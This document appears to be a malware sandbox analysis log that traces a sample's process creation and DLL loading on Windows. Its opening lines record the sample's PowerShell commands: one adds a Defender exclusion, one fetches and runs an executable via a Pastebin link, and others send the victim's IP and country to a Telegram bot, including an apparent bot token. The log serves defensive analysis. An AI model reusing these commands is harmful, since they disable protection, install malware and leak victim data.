                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/ip'"Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/country'"Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002361597694&text=NEW%20LOGS!%0ABuild%20%3D%3E%20bbs%0AIP%20%3D%3E%208.46.123.75%0ACountry%20%3D%3E%20US'"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES42BA.tmp" "c:\Users\user\AppData\Local\Temp\1ixib5wl\CSC291E15774B6A482B9669CEACC9B56C.TMP"Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.cmdline"Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\mxtvcgq32fe.exe')"Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Temp\mxtvcgq32fe.exe "C:\Windows\Temp\mxtvcgq32fe.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/ip'"Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/country'"Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002361597694&text=NEW%20LOGS!%0ABuild%20%3D%3E%20bbs%0AIP%20%3D%3E%208.46.123.75%0ACountry%20%3D%3E%20US'"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4E05.tmp" "c:\Users\user\AppData\Local\Temp\juqgin2j\CSCBFD98E15EAE94B1A9A3E8A6348847C3D.TMP"Jump to behavior
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeSection loaded: mscoree.dll
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeSection loaded: apphelp.dll
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeSection loaded: version.dll
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeSection loaded: wldp.dll
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeSection loaded: amsi.dll
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeSection loaded: userenv.dll
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeSection loaded: profapi.dll
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeSection loaded: msasn1.dll
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeSection loaded: gpapi.dll
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winhttp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: webio.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mswsock.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winnsi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sspicli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: schannel.dll
